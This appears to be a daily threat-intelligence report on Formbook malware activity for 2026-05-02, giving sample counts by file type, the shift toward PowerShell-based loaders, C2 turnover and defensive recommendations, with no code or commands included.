Daily Summary
Formbook activity remained stable on 2026-05-02 with 38 new samples, a 15% increase over the 7-day average of 33. While the count is elevated, it falls within a normal fluctuation range and does not indicate a surge. The sample distribution shows a clear pivot to PowerShell-based delivery.
New Samples Detected
PowerShell scripts (.ps1) dominate today with 26 of 38 samples, representing 68% of all submissions. JavaScript (.js) follows with 5 samples, while executable files (.exe and .dll) collectively account for only 4. Traditional batch (.bat, .cmd) and VBScript (.vbe) files are minimal. This marks a continued shift away from compiled binaries toward script-based loaders, likely to bypass application whitelisting and static analysis.
Distribution Methods
The heavy reliance on .ps1 files suggests Formbook is being delivered via phishing emails containing PowerShell download cradles or macro-enabled documents that invoke PowerShell. The .js files may originate from drive-by download campaigns or email attachments. The low .exe and .dll count indicates threat actors are avoiding PE files to evade endpoint detection and response (EDR) product heuristics.
Detection Rate
Based on the prevalence of obfuscated PowerShell and JavaScript, many AV engines are likely generating mixed detection results. Script-based variants, especially those using reflection or .NET loading, can bypass signature-based engines. SOC teams should rely on behavioral detection and AMSI logging rather than signature matching for current samples.
C2 Infrastructure
Analysts identified 55 new C2 servers and 93 new IOCs today. This volume is consistent with Formbook’s pattern of rotating infrastructure frequently to avoid domain blocklists. No geographic clustering is evident in the data, but the high turnover suggests automated C2 provisioning.
7-Day Trend
Activity over the past week has been steady with slight daily variation. Today’s 38 samples are within the normal range for the family, and there is no evidence of an upward or downward trend.
Security Analysis
The dominance of .ps1 files (68%) over all other types represents a deliberate tactical shift. Historically, Formbook relied more heavily on packed .exe and macro-enabled Office files. The move to PowerShell aligns with broader adversary trends to leverage living-off-the-land binaries (LOLBins) for initial access and payload delivery. Defenders should focus on restricting PowerShell execution policy, enabling script block logging, and monitoring for base64-encoded commands in process creation events.